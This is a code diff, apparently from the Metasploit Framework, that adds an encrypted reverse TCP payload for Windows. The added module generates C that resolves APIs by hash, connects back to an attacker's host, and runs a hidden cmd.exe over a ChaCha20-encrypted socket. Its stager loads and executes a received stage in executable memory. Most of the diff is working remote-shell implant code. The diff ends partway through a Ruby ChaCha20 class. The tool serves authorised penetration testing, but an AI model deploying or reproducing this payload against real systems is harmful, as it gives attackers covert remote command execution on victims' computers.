-    rescue NoCompatiblePayloadError
+    rescue NoCompatiblePayloadError, Metasploit::Framework::Compiler::Mingw::UncompilablePayloadError
     end
     pl ||= ''
     pl.length
@@ -236,6 +243,13 @@ class Payload < Msf::Module
   #
   def offsets
     return module_info['Payload'] ? module_info['Payload']['Offsets'] : nil
+  end
+
+  #
+  # Returns the compiler dependencies if the payload has one
+  #
+  def dependencies
+    module_info['Dependencies']
   end
 
   #

--- a/lib/msf/core/payload/stager.rb
+++ b/lib/msf/core/payload/stager.rb
@@ -156,6 +156,18 @@ module Msf::Payload::Stager
     return raw
   end
 
+  def sends_hex_uuid?
+    false
+  end
+
+  def format_uuid(uuid)
+    if sends_hex_uuid?
+      return uuid
+    end
+
+    return Msf::Payload::UUID.new({raw: uuid_raw})
+  end
+
   #
   # Transmit the associated stage.
   #
@@ -169,7 +181,7 @@ module Msf::Payload::Stager
         if include_send_uuid
           uuid_raw = conn.get_once(16, 1)
           if uuid_raw
-            opts[:uuid] = Msf::Payload::UUID.new({raw: uuid_raw})
+            opts[:uuid] = format_uuid(uuid_raw)
           end
         end
       end

--- a/lib/msf/core/payload/windows/encrypted_payload_opts.rb
+++ b/lib/msf/core/payload/windows/encrypted_payload_opts.rb
@@ -1,0 +1,30 @@
+require 'msf/core'
+require 'securerandom'
+
+module Msf
+  module Payload::Windows::EncryptedPayloadOpts
+    include Msf::Payload::UUID::Options
+
+    LINK_SCRIPT_PATH = File.join(Msf::Config.install_root, 'data', 'utilities', 'encrypted_payload')
+
+    def initialize(info={})
+      super
+
+      register_options(
+      [
+        OptBool.new('CallWSAStartup', [ false, 'Adds the function that initializes the Winsock library', true ]),
+        OptString.new('ChachaKey', [ false, 'The initial key to encrypt payload traffic with', SecureRandom.hex(16) ]),
+        OptString.new('ChachaNonce', [ false, 'The initial nonce to use to encrypt payload traffic with', SecureRandom.hex(6) ])
+      ], self.class)
+
+      register_advanced_options(
+      [
+        OptBool.new('StripSymbols', [ false, 'Payload will be compiled without symbols', true ]),
+        OptEnum.new('OptLevel', [ false, 'The optimization level to compile with', 'O2', [ 'Og', 'Os', 'O0', 'O1', 'O2', 'O3' ] ]),
+        OptBool.new('KeepSrc', [ false, 'Keep source code after compiling it', true ]),
+        OptBool.new('KeepExe', [ false, 'Keep executable after compiling the payload', true ]),
+        OptBool.new('PayloadUUIDTracking', [ true, 'Whether or not to automatically register generated UUIDs', true ])
+      ], self.class)
+    end
+  end
+end

--- a/lib/msf/core/payload/windows/encrypted_reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/encrypted_reverse_tcp.rb
@@ -1,0 +1,609 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'rex/peparsey'
+require 'msf/core/payload/uuid/options'
+require 'msf/core/payload/windows'
+require 'msf/core/payload/windows/encrypted_payload_opts'
+require 'msf/core/payload/windows/payload_db_conf'
+require 'metasploit/framework/compiler/mingw'
+require 'rex/crypto/chacha20'
+
+module Msf
+
+###
+#
+# encrypted reverse tcp payload for Windows
+#
+###
+module Payload::Windows::EncryptedReverseTcp
+
+  include Msf::Payload::UUID::Options
+  include Msf::Payload::Windows
+  include Msf::Payload::Windows::EncryptedPayloadOpts
+  include Msf::Payload::Windows::PayloadDBConf
+
+
+  def initialize(*args)
+    super
+  end
+
+  def generate(opts={})
+    opts[:uuid] ||= generate_payload_uuid.puid_hex
+    iv = datastore['ChachaNonce']
+
+    conf =
+    {
+      call_wsastartup: datastore['CallWSAStartup'],
+      port:            format_ds_opt(datastore['LPORT']),
+      host:            format_ds_opt(datastore['LHOST']),
+      key:             datastore['ChachaKey'],
+      nonce:           datastore['ChachaNonce'],
+      iv:              iv,
+      uuid:            opts[:uuid],
+      staged:          staged?
+    }
+
+    src = ''
+    if staged?
+      src = generate_stager(conf)
+    else
+      src = generate_c_src(conf)
+    end
+
+    link_script = module_info['DefaultOptions']['LinkerScript']
+    compile_opts =
+    {
+      strip_symbols: datastore['StripSymbols'],
+      linker_script: link_script,
+      opt_lvl:       datastore['OptLevel'],
+      keep_src:      datastore['KeepSrc'],
+      keep_exe:      datastore['KeepExe'],
+      f_name:        (staged? ? 'reverse_pic_stager.exe' : 'reverse_pic_stageless.exe'),
+      arch:          self.arch_to_s
+    }
+
+    comp_code = get_compiled_shellcode(src, compile_opts)
+
+    chacha_conf =
+    {
+      'uuid'  =>  conf[:uuid],
+      'key'   =>  conf[:key],
+      'nonce' =>  conf[:nonce]
+    }
+    save_conf_to_db(chacha_conf)
+
+    comp_code
+  end
+
+  def initial_code
+    src = headers
+    src << align_rsp if self.arch_to_s.eql?('x64')
+
+    if staged?
+      src << chacha_func_staged
+    else
+      src << chacha_func
+    end
+    src << exit_proc
+  end
+
+  def generate_stager(conf)
+    src = initial_code
+
+    if conf[:call_wsastartup]
+      src << init_winsock
+    end
+
+    src << comm_setup
+    src << get_load_library(conf[:host], conf[:port])
+    src << call_init_winsock if conf[:call_wsastartup]
+    src << start_comm(conf[:uuid])
+    src << stager_comm
+  end
+
+  def sends_hex_uuid?
+    true
+  end
+
+  def include_send_uuid
+    true
+  end
+
+  def generate_stage(opts={})
+    conf = opts[:datastore] || datastore
+    conf[:staged] = true
+    stage_uuid = opts[:uuid] || uuid
+    key, nonce = retrieve_chacha_creds(stage_uuid)
+
+    unless key && nonce
+      print_status('No existing key/nonce in db. Resorting to datastore options.')
+      key = conf['ChachaKey']
+      nonce = conf['ChachaNonce']
+    end
+    iv = nonce
+
+    link_script = module_info['DefaultOptions']['LinkerScript']
+    comp_opts =
+    {
+      strip_symbols: false,
+      linker_script: link_script,
+      keep_src:      datastore['KeepSrc'],
+      keep_exe:      datastore['KeepExe'],
+      f_name:        'reverse_pic_stage.exe',
+      arch:          self.arch_to_s
+    }
+
+    src = initial_code
+    src << get_new_key
+    src << init_proc
+    src << exec_payload_stage
+    shellcode = get_compiled_shellcode(src, comp_opts)
+
+    stage_obj = Rex::Crypto::Chacha20.new(key, iv)
+    stage_obj.chacha20_crypt(shellcode)
+    #Rex::Crypto.chacha_encrypt(key, iv, shellcode)
+  end
+
+  def generate_c_src(conf)
+    src = initial_code
+
+    if conf[:call_wsastartup]
+      src << init_winsock
+    end
+
+    src << comm_setup
+    src << get_new_key
+    src << init_proc
+    src << get_load_library(conf[:host], conf[:port])
+    src << call_init_winsock if conf[:call_wsastartup]
+    src << start_comm(conf[:uuid])
+    src << single_comm
+  end
+
+  def get_hash(lib, func)
+    Rex::Text.block_api_hash(lib, func)
+  end
+
+  def get_compiled_shellcode(src, opts={})
+    comp_obj = nil
+    case opts[:arch]
+    when 'x86'
+      comp_obj = Metasploit::Framework::Compiler::Mingw::X86.new(opts)
+    when 'x64'
+      comp_obj = Metasploit::Framework::Compiler::Mingw::X64.new(opts)
+    end
+
+    compiler_out = comp_obj.compile_c(src)
+    unless compiler_out.empty?
+      elog(compiler_out)
+      raise Metasploit::Framework::Compiler::Mingw::UncompilablePayloadError.new('Payload did not compile. Check the logs for further information.')
+    end
+
+    comp_file = "#{Msf::Config.install_root}/#{opts[:f_name]}"
+    raise Metasploit::Framework::Compiler::Mingw::CompiledPayloadNotFoundError unless File.exist?("#{Msf::Config.install_root}/#{opts[:f_name]}")
+    bin = read_exe(comp_file)
+    bin = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(bin))
+
+    text_section = bin.sections.first
+    text_section = text_section._isource
+
+    comp_obj.cleanup_files
+    text_section.rawdata
+  end
+
+  def read_exe(file)
+    bin = IO.binread(file)
+
+    bin.strip
+  end
+
+  #
+  # Options such as the LHOST and PORT
+  # need to become a null-terminated array
+  # to ensure they exist in the .text section.
+  #
+  def format_ds_opt(opt)
+    modified = ''
+
+    opt = opt.to_s
+    opt.split('').each { |elem| modified << "\'#{elem}\', " }
+    modified = "#{modified}0"
+  end
+
+  def headers
+    %Q^
+      #include "winsock_util.h"
+      #include "payload_util.h"
+      #include "kernel32_util.h"
+
+      #include "chacha.h"
+    ^
+  end
+
+  def align_rsp
+    %Q^
+      void AlignRSP()
+      {
+        asm("push %rsi                      \\t\\n\\
+             mov %rsp, %rsi                 \\t\\n\\
+             and $0x0FFFFFFFFFFFFFFF0, %rsp \\t\\n\\
+             sub $0x020, %rsp               \\t\\n\\
+             call ExecutePayload            \\t\\n\\
+             mov %rsi, %rsp                 \\t\\n\\
+             pop %rsi                       \\t\\n\\
+             ret");
+      }
+    ^
+  end
+
+  def chacha_func_staged
+    %Q^
+      char *chacha_data(char *buf, int len, chacha_ctx *ctx)
+      {
+        chacha_encrypt_bytes(ctx, buf, buf, len);
+        buf[len] = '\\0';
+
+        return buf;
+      }
+    ^
+  end
+
+  def chacha_func
+    %Q^
+      char *chacha_data(char *buf, int len, chacha_ctx *ctx)
+        {
+          FuncVirtualAlloc VirtualAlloc = (FuncVirtualAlloc) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'VirtualAlloc')}); // hash('kernel32.dll',
+          char *out = VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_READWRITE);
+          chacha_encrypt_bytes(ctx, buf, out, len);
+          out[len] = '\\0';
+          return out;
+        }
+    ^
+  end
+
+  def exit_proc
+    %Q^
+      UINT ExitProc()
+      {
+        DWORD term_status;
+        FuncGetCurrentProcess GetCurrentProcess = (FuncGetCurrentProcess) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'GetCurrentProcess')}); // hash('kernel32.dll', 'GetCurrentProcess') -> 0x51e2f352
+        FuncGetExitCodeProcess GetExitCodeProcess = (FuncGetExitCodeProcess) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'GetExitCodeProcess')}); // hash('kernel32.dll', 'GetExitCodeProcess' -> 0xee54785f
+
+        HANDLE curr_proc_handle = GetCurrentProcess();
+        GetExitCodeProcess(curr_proc_handle, &term_status);
+
+        return term_status;
+      }
+    ^
+  end
+
+  def init_winsock
+    %Q^
+      void init_winsock()
+      {
+        WSADATA wsadata;
+        FuncWSAStartup WSAInit;
+        UINT term_proc_status = ExitProc();
+        FuncExitProcess ExitProcess = (FuncExitProcess) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'ExitProcess')}); // hash('kernel32.dll', 'ExitProcess') -> 0x56a2b5f0
+
+        WSAInit = (FuncWSAStartup) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'WSAStartup')}); // hash('ws2_32.dll', 'WSAStartup') -> 0x006B8029
+        if(WSAInit(MAKEWORD(2, 2), &wsadata))
+        {
+          ExitProcess(term_proc_status);
+        }
+      }
+
+    ^
+  end
+
+  def comm_setup
+    %Q^
+      struct addrinfo *conn_info_setup(char *i, char *p)
+      {
+        UINT term_proc_stat = ExitProc();
+        struct addrinfo hints, *results = NULL, *first = NULL;
+        FuncGetAddrInfo GetAddrInf = (FuncGetAddrInfo) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'getaddrinfo')}); // hash('ws2_32.dll', 'getaddrinfo') -> 0x14f1f695
+        FuncFreeAddrInfo FreeAddrInf = (FuncFreeAddrInfo) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'freeaddrinfo')}); // hash('ws2_32.dll', 'freeaddrinfo') -> 0x150784f5
+        FuncExitProcess ExitProcess = (FuncExitProcess) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'ExitProcess')}); // hash('kernel32.dll', 'ExitProcess') -> 0x56a2b5f0
+
+        SecureZeroMemory(&hints, sizeof(hints));
+        hints.ai_family = AF_INET;
+        hints.ai_socktype = SOCK_STREAM;
+        hints.ai_protocol = IPPROTO_TCP;
+
+        if(GetAddrInf(i, p, &hints, &results))
+        {
+          ExitProcess(term_proc_stat);
+        }
+
+        first = results;
+        if(first == NULL)
+        {
+          FreeAddrInf(results);
+          ExitProcess(term_proc_stat);
+        }
+
+        return first;
+      }
+    ^
+  end
+
+  def get_new_key
+    %Q^
+      char *get_new_key(SOCKET s)
+      {
+        FuncVirtualAlloc VirtualAlloc = (FuncVirtualAlloc) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'VirtualAlloc')}); // hash('kernel32.dll',
+        FuncRecv RecvData = (FuncRecv) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'recv')});
+
+        char *received = VirtualAlloc(NULL, 45, MEM_COMMIT, PAGE_READWRITE);
+        int recv_num = RecvData(s, received, 44, 0);
+
+        received[44] = '\\0';
+        return received;
+      }
+    ^
+  end
+
+  def init_proc
+    %Q^
+      HANDLE* init_process(SOCKET s)
+      {
+        char cmd[] = { 'c', 'm', 'd', 0 };
+        STARTUPINFO si;
+        SECURITY_ATTRIBUTES sa;
+        PROCESS_INFORMATION pi;
+        UINT proc_stat = ExitProc();
+        HANDLE out_rd, out_wr, in_rd, in_wr;
+        FuncExitProcess ExitProcess = (FuncExitProcess) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'ExitProcess')}); // hash('kernel32.dll', 'ExitProcess') -> 0x56a2b5f0
+
+        SecureZeroMemory(&si, sizeof(si));
+        SecureZeroMemory(&sa, sizeof(sa));
+        SecureZeroMemory(&pi, sizeof(pi));
+
+        si.cb = sizeof(si);
+        sa.nLength = sizeof(sa);
+        sa.lpSecurityDescriptor = NULL;
+        sa.bInheritHandle = TRUE;
+
+        FuncCreatePipe CreatePipe = (FuncCreatePipe) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'CreatePipe')}); // hash('kernel32.dll', 'CreatePipe') -> 0xeafcf3e
+        CreatePipe(&out_rd, &out_wr, &sa, 0);
+        CreatePipe(&in_rd, &in_wr, &sa, 0);
+
+        FuncSetHandleInformation SetHandleInformation = (FuncSetHandleInformation) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'SetHandleInformation')}); // hash('kernel32.dll', 'SetHandleInformation') -> 0x1cd313ca
+        SetHandleInformation(out_rd, HANDLE_FLAG_INHERIT, 0);
+        SetHandleInformation(in_wr, HANDLE_FLAG_INHERIT, 0);
+
+        si.dwFlags = STARTF_USESTDHANDLES;
+        si.hStdError = si.hStdOutput = out_wr;
+        si.hStdInput = in_rd;
+
+        FuncCreateProcess CreateProcess = (FuncCreateProcess) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'CreateProcessA')}); // hash('kernel32.dll', 'CreateProcess') -> 0x863fcc79
+        if(!CreateProcess(NULL, cmd, &sa, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi))
+        {
+          ExitProcess(proc_stat);
+        }
+
+        FuncCloseHandle CloseHandle = (FuncCloseHandle) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'CloseHandle')}); // hash('kernel32.dll', 'CloseHandle') -> 0x528796c6
+        CloseHandle(pi.hProcess);
+        CloseHandle(pi.hThread);
+
+        FuncGlobalAlloc GlobalAlloc = (FuncGlobalAlloc) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'GlobalAlloc')}); // hash('kernel32.dll', 'GlobalAlloc') -> 0x520f76f6
+        HANDLE *handle_arr = GlobalAlloc(GMEM_FIXED, sizeof(HANDLE) * 2);
+
+        handle_arr[0] = out_rd;
+        handle_arr[1] = in_wr;
+
+        return handle_arr;
+      }
+
+      void communicate(HANDLE out, HANDLE in, SOCKET s)
+      {
+        DWORD data = 0;
+        char buf[512];
+        int buf_size = 512;
+        int new_key = 0;
+        DWORD bytes_received = 0;
+        FuncSleep Sleep = (FuncSleep) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'Sleep')}); // hash('kernel32.dll', 'Sleep') -> 0xe035f044
+        FuncSend SendData = (FuncSend) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'send')}); // hash('ws2_32.dll', 'send') -> 0x5f38ebc2
+        FuncRecv RecvData = (FuncRecv) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'recv')}); // hash('ws2_32.dll', 'recv') -> 0x5fc8d902
+        FuncReadFile ReadFile = (FuncReadFile) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'ReadFile')}); // hash('kernel32.dll', 'ReadFile') -> 0xbb5f9ead
+        FuncWriteFile WriteFile = (FuncWriteFile) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'WriteFile')}); // hash('kernel32.dll', 'WriteFile') -> 0x5bae572d
+        FuncExitProcess ExitProcess = (FuncExitProcess) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'ExitProcess')}); // hash('kernel32.dll', 'ExitProcess') -> 0x56a2b5f0
+        FuncPeekNamedPipe PeekNamedPipe = (FuncPeekNamedPipe) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'PeekNamedPipe')}); // hash('kernel32.dll', 'PeekNamedPipe') -> 0xb33cb718
+        FuncVirtualFree VirtualFree = (FuncVirtualFree) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'VirtualFree')}); // hash('kernel32.dll', 'VirtualFree') -> 0x300f2f0b
+
+        SecureZeroMemory(buf, buf_size);
+        UINT term_stat = ExitProc();
+        char init_key[] = { #{format_ds_opt(datastore['ChachaKey'])} };
+        char init_nonce[] = { #{format_ds_opt(datastore['ChachaNonce'])} };
+        char *key = init_key;
+        char *nonce = init_nonce;
+
+        chacha_ctx ctx;
+        chacha_keysetup(&ctx, key, 256, 96);
+        chacha_ivsetup(&ctx, nonce);
+
+        do
+        {
+          if(new_key == 0)
+          {
+            char *stream = get_new_key(s);
+            if(stream == NULL)
+            {
+              ExitProcess(term_stat);
+            }
+
+            char *res = chacha_data(stream, 44, &ctx);
+            key = res + 12;
+            nonce = res;
+            new_key = 1;
+
+            chacha_keysetup(&ctx, key, 256, 96);
+            chacha_ivsetup(&ctx, nonce);
+          }
+
+          if(PeekNamedPipe(out, NULL, 0, NULL, &data, NULL) && data > 0)
+          {
+            if(!ReadFile(out, buf, buf_size-1, &bytes_received, NULL))
+            {
+              ExitProcess(term_stat);
+            }
+            char *cmd = chacha_data(buf, bytes_received, &ctx);
+            SendData(s, cmd, bytes_received, 0);
+            SecureZeroMemory(buf, buf_size);
+            VirtualFree(cmd, bytes_received+1, MEM_RELEASE);
+          }
+          else
+          {
+            DWORD bytes_written = 0;
+
+            bytes_received = RecvData(s, buf, buf_size-1, 0);
+            if(bytes_received > 0)
+            {
+              char *dec_cmd = chacha_data(buf, bytes_received, &ctx);
+              WriteFile(in, dec_cmd, bytes_received, &bytes_written, NULL);
+              SecureZeroMemory(buf, buf_size);
+              VirtualFree(dec_cmd, bytes_received+1, MEM_RELEASE);
+            }
+          }
+          Sleep(100);
+        } while(bytes_received > 0);
+      }
+
+    ^
+  end
+
+  #
+  # ExecutePayload acts as the main function of the c program
+  #
+  def get_load_library(host, port)
+    %Q^
+      void ExecutePayload(VOID)
+      {
+        FuncLoadLibraryA LoadALibrary;
+        FuncWSASocketA WSASock;
+        FuncWSACleanup WSACleanup;
+        FuncConnect ConnectSock;
+        UINT proc_term_status = ExitProc();
+        SOCKET conn_socket = INVALID_SOCKET;
+        FuncExitProcess ExitProcess = (FuncExitProcess) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'ExitProcess')}); // hash('kernel32.dll', 'ExitProcess') -> 0x56a2b5f0
+        FuncCloseHandle CloseHandle = (FuncCloseHandle) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'CloseHandle')}); // hash('kernel32.dll', 'CloseHandle') -> 0x528796c6
+
+        char ip[] = { #{host} };
+        char port[] = { #{port} };
+        char ws2[] = { 'w', 's', '2', '_', '3', '2', '.', 'd', 'l', 'l', 0 };
+
+        LoadALibrary = (FuncLoadLibraryA) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'LoadLibraryA')}); // hash('kernel32.dll', 'LoadLibrary') -> 0x0726774C
+        LoadALibrary((LPTSTR) ws2);
+      ^
+  end
+
+  def call_init_winsock
+    %Q^
+        init_winsock();
+    ^
+  end
+
+  def start_comm(uuid)
+    %Q^
+        struct addrinfo *info = NULL;
+        info = conn_info_setup(ip, port);
+        FuncSend SendData = (FuncSend) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'send')}); // hash('ws2_32.dll', 'send') -> 0x5f38ebc2
+        WSASock = (FuncWSASocketA) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'WSASocketA')}); // hash('ws2_32.dll', 'WSASocketA') -> 0xe0df0fea
+        conn_socket = WSASock(info->ai_family, info->ai_socktype, info->ai_protocol, NULL, 0, 0);
+
+        if(conn_socket == INVALID_SOCKET)
+        {
+          ExitProcess(proc_term_status);
+        }
+
+        ConnectSock = (FuncConnect) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'connect')}); // hash('ws2_32.dll', 'connect') -> 0x6174a599
+        if(ConnectSock(conn_socket, info->ai_addr, info->ai_addrlen) == SOCKET_ERROR)
+        {
+          ExitProcess(proc_term_status);
+        }
+
+        char uuid[] = { #{format_ds_opt(uuid)} };
+        SendData(conn_socket, uuid, 16, 0);
+
+      ^
+   end
+
+  def single_comm
+    %Q^
+        HANDLE *comm_handles = init_process(conn_socket);
+        communicate(*(comm_handles), *(comm_handles+1), conn_socket);
+
+        CloseHandle(*comm_handles);
+        CloseHandle(*(comm_handles + 1));
+        WSACleanup = (FuncWSACleanup) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'WSACleanup')}); // hash('ws2_32.dll', 'WSACleanup') -> 0xf44a6e2b
+      }
+    ^
+  end
+
+  def stager_comm
+    reg = self.arch_to_s.eql?('x86') ? 'edi' : 'rdi'
+    inst = self.arch_to_s.eql?('x86') ? 'movl' : 'movq'
+
+    %Q^
+        FuncRecv RecvData = (FuncRecv) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'recv')}); // hash('ws2_32.dll', 'recv') -> 0x5fc8d902
+        unsigned int stage_size;
+        int recvd = RecvData(conn_socket, (char *) &stage_size, 4, 0);
+        if(recvd != 4)
+        {
+          ExitProcess(proc_term_status);
+        }
+
+        FuncVirtualAlloc VirtualAlloc = (FuncVirtualAlloc) GetProcAddressWithHash(#{get_hash('kernel32.dll', 'VirtualAlloc')}); // hash('kernel32.dll', 'VirtualAlloc') -> 0xe553a458
+        register char *received = VirtualAlloc(NULL, stage_size + 1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+        int recv_stg = RecvData(conn_socket, received, stage_size, 0);
+        if(recv_stg != stage_size)
+        {
+          ExitProcess(proc_term_status);
+        }
+
+        char key[] = { #{format_ds_opt(datastore['ChachaKey'])} };
+        char nonce[] = { #{format_ds_opt(datastore['ChachaNonce'])} };
+
+        chacha_ctx dec_ctx;
+        chacha_keysetup(&dec_ctx, key, 256, 96);
+        chacha_ivsetup(&dec_ctx, nonce);
+        chacha_data(received, stage_size + 1, &dec_ctx);
+
+        // hand the socket to the stage
+        asm("#{inst} %0, %%#{reg}"
+            :
+            : "r" (conn_socket)
+            : "%#{reg}"
+        );
+
+        // call the stage
+        void (*func)() = (void(*)())received;
+        func();
+      }
+    ^
+  end
+
+  def exec_payload_stage
+    reg = self.arch_to_s.eql?('x86') ? 'edi' : 'rdi'
+    inst = self.arch_to_s.eql?('x86') ? 'movl' : 'movq'
+
+    %Q^
+     void ExecutePayload()
+     {
+       SOCKET conn_socket = INVALID_SOCKET;
+
+       asm("#{inst} %%#{reg}, %0"
+           :
+           :"m"(conn_socket)
+       );
+
+       HANDLE *comm_handles = init_process(conn_socket);
+       communicate(*(comm_handles), *(comm_handles+1), conn_socket);
+     }
+    ^
+  end
+end
+end

--- a/lib/msf/core/payload/windows/payload_db_conf.rb
+++ b/lib/msf/core/payload/windows/payload_db_conf.rb
@@ -1,0 +1,63 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+
+module Msf::Payload::Windows::PayloadDBConf
+  def initialize(*args)
+    super
+  end
+
+  #
+  # Saves a payload configuration to the db
+  #
+  # @param conf [Hash]
+  #   accepts a uuid, which will be used as
+  #   the payload identifier. Additional
+  #   hash values will be saved within `build_opts`
+  def save_conf_to_db(conf={})
+    return nil unless (framework.db && framework.db.active)
+
+    return nil unless conf['uuid']
+    payload_uuid = conf['uuid']
+    conf.delete('uuid')
+
+    saved_payload = framework.db.get_payload(uuid: payload_uuid)
+    if saved_payload
+      framework.db.update_payload(id: saved_payload.id, build_opts: conf)
+    else
+      print_status('Payload does not exist in database. Attempting to save it now.')
+      framework.db.create_payload(uuid: payload_uuid, build_opts: conf)
+    end
+  rescue
+    print_error('Failed to save payload info to database')
+  end
+
+  # Retrieve payload configuration from db
+  #
+  # @param uuid [String]
+  #   accepts the payload uuid and
+  #   a hash of the payload information will
+  #   be returned
+  def retrieve_conf_from_db(uuid=nil)
+    return nil unless (framework.db && framework.db.active)
+
+    curr_payload = framework.db.get_payload(uuid: uuid)
+    return nil unless curr_payload && curr_payload[:build_opts]
+
+    return curr_payload[:build_opts]
+  end
+
+  #
+  # @param uuid [String]
+  #   retrieves the key and nonce for
+  #   payloads using the chacha cipher
+  #   from the database
+  def retrieve_chacha_creds(uuid=nil)
+    return nil unless uuid
+
+    build_opts = retrieve_conf_from_db(uuid)
+    return nil unless build_opts['key'] && build_opts['nonce']
+
+    return build_opts['key'], build_opts['nonce']
+  end
+end

--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 require 'msf/core/payload/apk'
 require 'active_support/core_ext/numeric/bytes'
+require 'msf/core/payload/windows/payload_db_conf'
 module Msf
 
   class PayloadGeneratorError < StandardError
@@ -360,6 +361,13 @@ module Msf
         raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload)
         gen_payload = raw_payload
       else
+        if payload_module.is_a?(Msf::Payload::Windows::PayloadDBConf)
+          payload_module.datastore.import_options_from_hash(datastore)
+          ds_opt = payload_module.datastore
+          cli_print("[!] Database is not active! Payload key and nonce must be manually set when creating handler") unless framework.db.active
+          cli_print("[-] Please ensure payload key and nonce match when setting up handler: #{ds_opt['ChachaKey']} - #{ds_opt['ChachaNonce']}")
+        end
+
         raw_payload = generate_raw_payload
         raw_payload = add_shellcode(raw_payload)
 

--- a/lib/msf/core/payload_set.rb
+++ b/lib/msf/core/payload_set.rb
@@ -78,6 +78,15 @@ class PayloadSet < ModuleSet
     _singles.each_pair { |name, op|
       mod, handler = op
 
+      # if the payload has a dependency, check
+      # if it is supported on the system
+      payload_dependencies = op[4].dependencies
+      unless payload_dependencies.empty?
+        supported = payload_dependencies.all?(&:available?)
+        elog("Dependency for #{name} is not supported") unless supported
+        next unless supported
+      end
+
       # Build the payload dupe using the determined handler
       # and module
       p = build_payload(handler, mod)
@@ -100,9 +109,26 @@ class PayloadSet < ModuleSet
     _stagers.each_pair { |stager_name, op|
       stager_mod, handler, stager_platform, stager_arch, stager_inst = op
 
+      # Pass if the stager has a dependency
+      # and doesn't have the dependency installed
+      stager_dependencies = stager_inst.dependencies
+      unless stager_dependencies.empty?
+        supported = stager_dependencies.all?(&:available?)
+        elog("Dependency for #{stager_name} is not supported") unless supported
+        next unless supported
+      end
+
       # Walk the array of stages
       _stages.each_pair { |stage_name, ip|
         stage_mod, _, stage_platform, stage_arch, stage_inst = ip
+
+        #
+        # if the stager or stage has a dependency, check
+        # if they are compatible
+        #
+        unless stager_dependencies.empty? && stage_inst.dependencies.empty?
+          next unless stager_dependencies == stage_inst.dependencies
+        end
 
         # No intersection between platforms on the payloads?
         if ((stager_platform) and

--- a/lib/rex.rb
+++ b/lib/rex.rb
@@ -114,6 +114,11 @@ require 'rex/compat'
 require 'rex/sslscan/scanner'
 require 'rex/sslscan/result'
 
+# Cryptography
+require 'rex/crypto/aes256'
+require 'rex/crypto/rc4'
+require 'rex/crypto/chacha20'
+
 
 # Overload the Kernel.sleep() function to be thread-safe
 Kernel.class_eval("

--- a/lib/rex/crypto/chacha20.rb
+++ b/lib/rex/crypto/chacha20.rb
@@ -1,0 +1,98 @@
+# -*- coding: binary -*-
+
+module Rex
+  module Crypto
+    class Chacha20
+      attr_reader :chacha_ctx
+
+      def initialize(key, iv)
+        raise TypeError unless key.is_a? String
+        raise TypeError unless iv.is_a? String
+
+        @chacha_ctx = chacha20_ctx_setup(key, iv)
+      end
+
+      def reset_cipher(key, iv)
+        @chacha_ctx = chacha20_ctx_setup(key, iv)
+      end
+
+      def chacha20_update_ctx
+        @chacha_ctx[12] = (@chacha_ctx[12] + 1) & 0xffffffff
+      end
+
+      def chacha20_ctx_setup(key, iv, position=1)
+        chacha_constants = [1634760805, 857760878, 2036477234, 1797285236]
+        chacha_ctx = chacha_constants
+
+        chacha_ctx += key.unpack('V8')
+        chacha_ctx[12] = position
+        chacha_ctx += iv.unpack('VVV')
+
+        chacha_ctx
+      end
+
+      def chacha20_crypt(data)
+        num_blocks = data.length / 64
+        if data.length % 64 != 0
+         num_blocks += 1
+        end
+
+        keystream = []
+        (1..num_blocks).each do |block|
+          keystream << chacha20_block_func
+          chacha20_update_ctx
+        end
+        keystream = keystream.flatten
+
+        enc = []
+        i = 0
+        data.unpack("c*").each do |a|
+          enc << (a.ord ^ keystream[i])
+          i += 1
+        end
+        enc.pack("c*").force_encoding('ASCII-8BIT')
+      end
+
+      def chacha20_block_func
+        chacha_state = @chacha_ctx.dup
+
+        (1..10).each do |round|
+          quarter_round(chacha_state, 0, 4, 8, 12)
+          quarter_round(chacha_state, 1, 5, 9, 13)
+          quarter_round(chacha_state, 2, 6, 10, 14)
+          quarter_round(chacha_state, 3, 7, 11, 15)
+          quarter_round(chacha_state, 0, 5, 10, 15)
+          quarter_round(chacha_state, 1, 6, 11, 12)
+          quarter_round(chacha_state, 2, 7, 8, 13)
+          quarter_round(chacha_state, 3, 4, 9, 14)
+        end
+
+        keystream_arr = []
+        (0..15).each do |index|
+          keystream_ch = (chacha_state[index] + @chacha_ctx[index]) & 0xffffffff
+          keystream_arr << (keystream_ch & 0xff)
+          keystream_arr << (keystream_ch >> 8 & 0xff)
